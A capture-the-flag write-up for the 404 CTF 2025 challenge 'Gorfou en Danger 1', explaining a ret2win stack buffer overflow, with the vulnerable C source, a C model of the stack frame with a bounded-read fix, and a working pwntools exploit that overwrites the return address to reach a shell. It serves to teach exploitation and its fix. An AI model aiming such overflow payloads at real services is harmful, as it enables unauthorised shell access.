404 CTF 2025 - Gorfou en Danger 1

Challenge Analysis
This challenge is a classic example of a stack buffer overflow with execution redirection (ret2win). Here are the key points:

- In the `take_command()` function, the program uses a buffer of 256 bytes (0x100):

```c
void take_command() {
    char command[0x100];
    // ...
}
```

- The call to `read()` reads up to 304 bytes (0x130), creating an overflow of 48 bytes:

```c
read(0, command, 0x130);
```

This overflow allows overwriting the saved rbp and the return address on the stack.

- A function `debug_access()` exists in the program but is never reached by the normal control flow. This function executes a shell:

```c
void debug_access(void) {
    puts("Accès à l'interface de debogage...");
    __asm__(
        ".intel_syntax noprefix;"
        "push 0x0;"   // 8-byte adjustment that keeps rsp 16-byte aligned for system() when entered via a return instead of a call
        ".att_syntax;"
    );
    system("/bin/sh");
    return;
}
```

- The main function sets up the environment and repeatedly calls `take_command()` in an infinite loop:

```c
int main(void) {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);
    menu();
    printf("Terminal de contrôle à distance de la base martienne Fermat\n");
    while (1) {
        take_command();
    }
    return 0;
}
```
Exploitation
The strategy was to:

- Fill the buffer with arbitrary characters
- Overwrite the return address with the address of the `debug_access()` function
- Obtain a shell and retrieve the flag

The payload:

- 264 bytes of padding (256 for the buffer + 8 for the saved rbp)
- Address of `debug_access()` (0x4004fd)
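To check the frame layout the analysis and the payload rely on (the 0x100-byte buffer, the saved rbp at offset 256, the return address at 264) and to show the bounded read that would have closed the hole, here is an added C example that is not part of the writeup or the challenge source: `struct frame` is a constructed model of the stack frame, and a pipe stands in for the service's stdin.

```c
#include <stddef.h>
#include <string.h>
#include <unistd.h>

/* Constructed model of take_command()'s amd64 stack frame: the 0x100-byte
 * buffer, the saved rbp, the return address, and what a 0x130-byte read spills past them. */
struct frame {
    char command[0x100];
    unsigned char saved_rbp[8];
    unsigned char ret_addr[8];
    unsigned char spill[0x130 - 0x110];
};

/* Hardened read: stores at most bufsz - 1 bytes and always NUL-terminates, so no
 * input length can reach the saved rbp or the return address. Returns bytes stored or -1. */
ssize_t read_command_bounded(int fd, char *buf, size_t bufsz) {
    if (bufsz == 0) return -1;
    ssize_t n = read(fd, buf, bufsz - 1);
    if (n < 0) return -1;
    buf[n] = '\0';
    return n;
}

/* Feed payload_len bytes of 'A' through a pipe (standing in for stdin) and report
 * whether the modelled return address was overwritten: 1 = clobbered, 0 = intact, -1 = error.
 * bounded == 0 reproduces the original read(0, command, 0x130); bounded != 0 uses the fix. */
int return_address_clobbered(size_t payload_len, int bounded) {
    struct frame f;
    char payload[0x130];
    int fds[2];
    if (payload_len > sizeof payload || pipe(fds) < 0) return -1;
    memset(&f, 0, sizeof f);
    memset(payload, 'A', payload_len);
    if (write(fds[1], payload, payload_len) != (ssize_t)payload_len) { close(fds[0]); close(fds[1]); return -1; }
    close(fds[1]);
    if (bounded)
        read_command_bounded(fds[0], f.command, sizeof f.command);
    else
        read(fds[0], &f, 0x130);  /* the challenge's unbounded read, modelled on the frame */
    close(fds[0]);
    for (size_t i = 0; i < sizeof f.ret_addr; i++)
        if (f.ret_addr[i] != 0) return 1;
    return 0;
}
```

With the original read, 272 bytes (264 of padding plus 8 more) are enough to cover the return address slot; with the bounded read, no length is.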
Exploit Code
```python
#!/usr/bin/env python3
from pwn import *

context.arch = 'amd64'
context.log_level = 'info'

p = remote('challenges.404ctf.fr', 32462)

# debug_access() sits at a fixed address (non-PIE binary), so no leak is needed
debug_addr = 0x4004fd

# 256 bytes to fill the command buffer + 8 bytes over the saved rbp
padding = b'A' * 264
payload = padding + p64(debug_addr)  # the next 8 bytes land on the return address

p.recvuntil(b'> ')
p.sendline(payload)
p.interactive()
```
Once the shell is obtained, you can run `cat flag.txt` to retrieve the flag.